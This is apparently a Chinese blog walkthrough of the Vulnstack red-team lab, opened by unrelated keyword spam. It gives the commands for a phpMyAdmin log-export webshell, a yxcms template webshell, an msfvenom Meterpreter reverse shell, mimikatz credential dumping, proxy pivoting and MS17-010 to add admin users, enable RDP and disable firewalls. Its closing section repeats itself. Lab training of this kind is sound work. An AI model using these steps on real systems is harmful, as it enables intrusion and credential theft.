帝国cms 网站搬家,成都兼职建设网站,wordpress对比discuz,磁力猫torrentkitty官网搭建
靶场下载#xff1a;
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G#xff0c;需要百度网盘会员)
下载好靶场文件后直接解压 直接用虚拟机打开靶场 更改网络ip 需要模拟内网和外网两个网段#xff0c; Win7 虚拟机相当于网关服务器#xff0c;所以需要…搭建
靶场下载
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G需要百度网盘会员)
下载好靶场文件后直接解压 直接用虚拟机打开靶场 更改网络ip 需要模拟内网和外网两个网段 Win7 虚拟机相当于网关服务器所以需要两张网卡一个用来向外网提供web服务一个是通向内网
将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式内网网络适配器 2 设置成 NAT 模式外网 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。 网络配置完成这三台虚拟主机默认开机密码都是 hongrisec2019开机提示密码已过期更改为 hongricse2024即可密码太简单会设置错误
在之后可能会用到桥接模式可以根据情况设置
在win7把环境启动其中可以设置一个桥接模式方便打靶
查看IP 访问192.168.129.158
这几台机器都是有防火墙的这里先看一下win7的防火墙和入站规则 接着可以在外面访问一下192.168.129.158 到这里靶场就搭建成功了
开始打靶
攻击机 kali
web服务器 win7
域成员 win2003
域控 win2008
目的先穿过防火墙打下web服务器接着再穿过防火墙拿下域内的机器域成员和域控。
打靶方法
端口扫描web路径的发现phpmyadmin渗透
日志导出getshell
yxcms渗透
编辑模板getshell
上线msfmsf渗透利用msf psexec模板利用ms17_010_command模板利用
打靶
由于在打靶前知道了ip所以直接就不进行信息收集了
直接来扫描端口
nmap -p- 192.168.129.158 -o result.txt/nmap -sV -Pn 192.168.129.158
有80和3306端口开放
phpmyadmin渗透
访问192.168.129.158:80,得到的是一个phpstudy探针的页面可以知道绝对路径
测试一下数据库的连接情况使用root/root弱口令连接测试成功
使用dirsearch工具或者御剑扫描一下存在的web服务
[08:42:52] 200 - 71KB - /phpinfo.php
[08:42:52] 301 - 242B - /phpMyAdmin - http://192.168.129.158/phpMyAdmin/
[08:42:52] 301 - 242B - /phpmyadmin - http://192.168.129.158/phpmyadmin/
[08:42:53] 200 - 32KB - /phpmyadmin/ChangeLog
[08:42:53] 200 - 2KB - /phpmyadmin/README
[08:42:53] 200 - 4KB - /phpmyAdmin/
[08:42:53] 200 - 4KB - /phpMyAdmin/index.php
[08:42:53] 200 - 4KB - /phpMyadmin/
[08:42:53] 200 - 4KB - /phpmyadmin/
[08:42:53] 200 - 4KB - /phpmyadmin/index.php
[08:42:53] 200 - 4KB - /phpMyAdmin/
扫描到这么多文件接着就是访问
访问 http://192.168.129.158/phpMyAdmin/
使用刚刚得到的弱口令进行登录root/root
日志导出getshell
查看日志导出
show variables like ‘general%’;
发现日志导出没有打开接着就要开启日志导出
set global general_log“ON”;
接着设置web路径
set global general_log_file“C:/phpStudy/www/404.php”;
执行select 1
访问http://192.168.129.158/404.php查看日志
接着执行select “?php phpinfo();?”;
接着刷新http://192.168.129.158/404.php查看日志的导出
以上几步操作说明web是可以用日志导出getshell的
最简单的就是可以写入一句话木马执行接着就可以用工具蚁剑连接到后台得到文件
yxcms渗透
访问192.168.129.158/yxcms
查看网页发现用户和密码
根据网页提示访问得到新的网页
直接admin/123456登录
成功登录后台
进入前台模板——模板管理——编辑文件
这里可以直接打开编辑写入webshell
访问http://192.168.129.158/yxcms/protected/apps/default/view/default/info.php 页面什么都没有显示
使用hackbar传入刚刚写入的phpinfo
接着用蚁剑连接
可以进入文件管理和虚拟终端在虚拟终端可以看到用户名及身份
msf上线
先进入msf工具使用页面
在kali使用msf工具生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.129.148 LPORT4444 -f exe 11.exe
成功将木马文件上传到web服务器 文件成功在终端显示 在kali上开启监听
msfconsole #开启msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options #可以查看一下写的内容
set lhost 192.168.33.133 #ip写kali的
set lport 3333 #监听端口
run #启动
设置好kali执行文件getshell 内网信息收集
net time /domain #查看时间服务器
net user /domain #查看域用户
net view /domain #查看有几个域
net view /domain:GOD #查看GOD域情况
nslookup 主机名 #查看域内其他主机 可能ip查不出来
net group “domain computers” /domain #查看域内所有的主机名
net group “domain admins” /domain #查看域管理员
net group “domain controllers” /domain #查看域控
获取目标主机的shell
shell #进入模拟终端
chcp 65001 #解决乱码
route print # 打印路由信息 可知内网网段应该是 192.168.52.0/24
首先判断是否在域中域控制器一般集成了DNS服务通过 ipconfig /all即可简单判断 域名为god.org,还可以使用下面这种方法查看
net view /domain #查询当前主机是否加入域如果加入则列出域名 查看域内信息
net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域 接着定位域控 域控的域名即 owa.god.org 用 ping 即可反查出域控server 2008ip为192.168.52.138 再来看一下域内的其它主机OWA是域控STU1是win7所以剩下的就是域成员得到ip为192.168.52.141 再来看一下域管理员可以看到这里我们获得的 Administrator 就是域控OWA的域管理员
net group “domain admins” /domain #查询域管理员 看一下域里有几个用户
net user /domain #查看域用户只有域管才能执行 提权
getuid #查看服务器权限
getsystem #提权
getuid #查看是否提权成功
成功得到系统权限 获取域用户的密码信息
方法一加载 kiwi模块
load kiwi #加载kiwi模块
creds_all #列出所有凭据
方法二加载mimikatz模块再尝试加载 mimikatz 模块加载模块前需要先将meterpreter迁移到64位的进程
ps #查看进程
migrate PID
load mimikatz
kiwi_cmd sekurlsa::logonpasswords
方法一不知道为什么一直显示不出来
方法二
ps
得到账户及登录密码密码和我一开始更改的一样
目前为止获得的内网信息有
域名god.org
域内有五个用户Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控OWA(192.168.52.138)
win7内网ip192.168.52.143
跨网段横向渗透
msf添加代理
添加路由
run autoroute -s 192.168.52.0/24 #添加路由
run autoroute -p #查看路由信息 配置代理
background
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1这里因为是本机可以写本地ip
run
jobs 然后在 proxychains 的配置文件 /etc/proxychains.conf添加本机的1080端口
socks4 127.0.0.1 1080
域成员渗透
首先看下域成员开放的端口全扫很久这里只扫描一些高危端口
proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141 这里看见开着445端口试着用一下ms17_010
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
run 添加一个用户尝试远程登录一下
还是使用这个模块依次执行下面命令
set command net user bbb qwer123 /add #添加用户
run
set command net localgroup administrators bbb /add #管理员权限
run
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口
run
set command netsh advfirewall set allprofiles state off #关闭防火墙
run
接着远程登录
proxychains rdesktop 192.168.52.141
使用刚刚添加的新用户进行登录而且原来的用户账户及密码也拿到了
对于另一台机器192.168.52.138的获取也是一样的操作
先连接创建新用户赋予其权限
Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口
run
set command netsh advfirewall set allprofiles state off #关闭防火墙
run
[外链图片转存中…(img-DoUuluZW-1734439783074)][外链图片转存中…(img-pquuSHzj-1734439783074)][外链图片转存中…(img-QvoP0AOc-1734439783074)]接着远程登录
proxychains rdesktop 192.168.52.141
使用刚刚添加的新用户进行登录而且原来的用户账户及密码也拿到了
对于另一台机器192.168.52.138的获取也是一样的操作
先连接创建新用户赋予其权限
然后直接远程登录
